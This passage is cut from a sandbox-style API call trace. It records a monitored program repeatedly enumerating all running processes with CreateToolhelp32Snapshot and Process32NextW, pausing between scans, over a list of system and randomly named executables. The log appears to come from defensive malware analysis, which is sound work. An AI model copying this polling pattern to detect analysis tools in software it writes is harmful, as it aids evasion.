lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.509] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.515] 
CloseHandle (hObject=0xbc) returned 1 [0106.515] Sleep (dwMilliseconds=0x12c) [0106.830] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.835] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.836] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.839] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.840] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.847] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.855] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.856] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.857] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.859] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.860] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.861] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.863] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.864] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.873] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.882] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.891] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.899] 
CloseHandle (hObject=0xc4) returned 1 [0106.899] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.904] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.904] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.908] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.908] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.910] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.912] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.915] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.916] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.918] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.919] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.920] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
